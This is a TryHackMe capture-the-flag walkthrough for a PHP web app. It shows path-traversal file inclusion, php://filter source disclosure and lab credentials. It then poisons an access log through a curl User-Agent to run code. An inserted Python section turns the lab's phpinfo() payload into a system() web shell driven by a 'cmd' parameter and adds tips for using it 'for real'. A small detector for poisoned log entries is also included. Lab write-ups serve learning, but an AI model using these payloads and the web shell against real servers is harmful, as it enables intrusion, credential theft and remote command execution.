TryHackMe: [Day 6] Web Exploitation Patch Management Is Hard

Mac Leo
4 min read · Apr 1, 2022


  1. Deploy the attached VM and look around. What is the entry point for our web application?

ANS: err

EXPLANATION:

Step 1: Open the link provided by TryHackMe (https://10-10-140-155.p.thmlabs.com/logs.php) and go to the home page. Notice that the URL becomes index.php?err=error.txt: the err parameter names a file for the server to load, and that parameter is the entry point we will abuse in the following questions.

2. Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

ANS: THM{d29e08941cf7fe41df55f1a7da6c4c06}

EXPLANATION:

Step 1: From the home page, https://10-10-140-155.p.thmlabs.com/index.php?err=error.txt, replace error.txt with ../../../../../../../../../etc/flag. The value is used as a file path without sanitisation, so the ../ sequences walk up to the filesystem root (levels beyond / are simply ignored, which is why a long chain is safe to use even if you do not know the web root's depth).

eg:

https://10-10-140-155.p.thmlabs.com/index.php?err=../../../../../../../../../etc/flag

3. Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?

ANS: THM{791d43d46018a0d89361dbf60d5d9eb8}

EXPLANATION:

Step 1: We can't read index.php the way we read /etc/flag in Question 2: including a .php file executes it, so we would only get the rendered page back rather than its source. The php://filter wrapper with convert.base64-encode returns the file's bytes base64-encoded instead, and the include echoes that encoded text without executing it.

Set the err parameter to the following wrapper:

eg:

https://10-10-140-155.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php

Step 2: Copy the base64 string and decode it (paste it into https://www.base64decode.org/, or run base64 -d locally). The decoded source contains the $flag value.

4. McSkidy forgot his login credential. Can you help him to login in order to recover one of the server’s passwords?

Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?

ANS: McSkidy:A0C315Aw3s0m

EXPLANATION:

Step 1: In Question 3, the decoded source of index.php refers to a file at ./includes/creds.php. Repeat the steps of Question 3, replacing index.php with ./includes/creds.php in the resource part of the wrapper:

eg:

https://10-10-140-155.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php

Step 2: Copy the base64 string and decode it (https://www.base64decode.org/ or base64 -d). The decoded file contains McSkidy's username and password.

5. Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server?

ANS: THM{552f313b52e3c3dbf5257d8c6db7f6f1}

EXPLANATION:

Step 1: Now that we have McSkidy's login credentials, log in and go to Password Recovery; the password of the flag.thm.aoc server is listed there.

6. The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

ANS: lfi-aoc-awesome-59aedca683fff9261263bb084880c965

EXPLANATION:

Step 1: Make sure you are logged in, then go to Log Access. (The page only shows the log to authorised users, but the LFI from the earlier questions reads the file regardless, which is what the next steps rely on.)

Step 2: Open a terminal on your machine and send one request whose User-Agent is PHP code. The application writes the User-Agent into app_access.log as-is:

curl -A "<?php phpinfo();?>" http://10-10-149-25.p.thmlabs.com/login.php

Then refresh the Log Access page to confirm the line was recorded.

Step 3: Log out of the website and go to the home dashboard.

Replace error.txt in the URL with ./includes/logs/app_access.log

Because the log file is now passed through include, the stored <?php phpinfo();?> is executed rather than displayed, and the page shows the site's PHP info. The System row contains the hostname.
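The log-poisoning step in code, from both sides. This is an added example, not part of the write-up: it builds the poisoning request and the follow-up LFI URL, and it generalises the phpinfo() payload to a one-line system() web shell driven by a cmd query parameter (a standard extension of the technique; the write-up itself only uses phpinfo()). It also includes the check a defender would run over the same log: find entries whose client-controlled fields carry a PHP open tag. The Apache combined log format, the cmd parameter name, the sample log lines and all function names are assumptions; the log path and the curl target come from the task.

```python
"""Added example: log poisoning through the LFI (offensive helpers) plus a
detector over the poisoned log. Log format, sample lines and names are assumed."""
import re
import shlex
import urllib.parse

LOG_PATH = "./includes/logs/app_access.log"  # location given in the task text

PHPINFO_PAYLOAD = "<?php phpinfo();?>"               # what the write-up injects
WEBSHELL_PAYLOAD = "<?php system($_GET['cmd']); ?>"  # generalisation: run any command


def poison_headers(php_payload=WEBSHELL_PAYLOAD):
    """Headers for the poisoning request. The server copies the User-Agent into
    app_access.log verbatim, so the PHP lands in the file the include will later parse."""
    return {"User-Agent": php_payload}


def poison_curl_command(base, headers):
    """The equivalent curl -A invocation, quoted for a POSIX shell."""
    return f"curl -A {shlex.quote(headers['User-Agent'])} {shlex.quote(base + '/login.php')}"


def rce_url(base, cmd, param="err", log_path=LOG_PATH):
    """Include the poisoned log through the LFI. With the web shell payload the
    cmd query parameter is what gets executed; with phpinfo() it is ignored."""
    return (f"{base}/index.php?{param}={urllib.parse.quote(log_path, safe='/')}"
            f"&cmd={urllib.parse.quote(cmd)}")


# Assumed Apache combined format: ip ident user [time] "request" status size "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def find_poisoned(log_text):
    """Return (line_no, ip, user_agent) for entries carrying a PHP open tag in a
    client-controlled field. Lines that do not parse are reported as well, because
    a payload containing a double quote breaks the quoted fields."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        m = COMBINED.match(line)
        if m is None:
            hits.append((n, None, line))
        elif any(PHP_TAG.search(m[f]) for f in ("ua", "request", "referer")):
            hits.append((n, m["ip"], m["ua"]))
    return hits


# Constructed sample: one normal visit, the two poisoning requests, then the LFI read.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Apr/2022:10:00:01 +0000] "GET /index.php?err=error.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2022:10:00:07 +0000] "GET /login.php HTTP/1.1" 200 800 "-" "<?php phpinfo();?>"
10.10.14.5 - - [01/Apr/2022:10:00:12 +0000] "GET /login.php HTTP/1.1" 200 800 "-" "<?php system($_GET['cmd']); ?>"
10.10.14.5 - - [01/Apr/2022:10:00:20 +0000] "GET /index.php?err=./includes/logs/app_access.log&cmd=hostname HTTP/1.1" 200 9000 "-" "curl/7.81.0"
"""


if __name__ == "__main__":
    base = "http://10-10-149-25.p.thmlabs.com"
    print(poison_curl_command(base, poison_headers(PHPINFO_PAYLOAD)))
    print(poison_curl_command(base, poison_headers()))
    print(rce_url(base, "hostname"))
    for line_no, ip, ua in find_poisoned(SAMPLE_LOG):
        print(f"poisoned entry on line {line_no} from {ip}: {ua}")
```

Two things to keep in mind when using this for real: every request you send while the include is live appends another line that will also be executed, so send the payload exactly once; and once the log is poisoned it stays poisoned until the file is rotated, which is why the detector flags the stored line rather than the request that created it.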

*****************THANK YOU****KEEP LEARNING ******************

HOPE THIS WALKTHROUGH HELPED YOU. IF SO, A LIKE WILL BE MUCH APPRECIATED, AND FOLLOW MY PROFILE FOR MORE WRITE-UPS

*******PEACE*****

Mac Leo

Hacker | Cybersecurity Researcher | CTF Player | Cybersecurity Enthusiast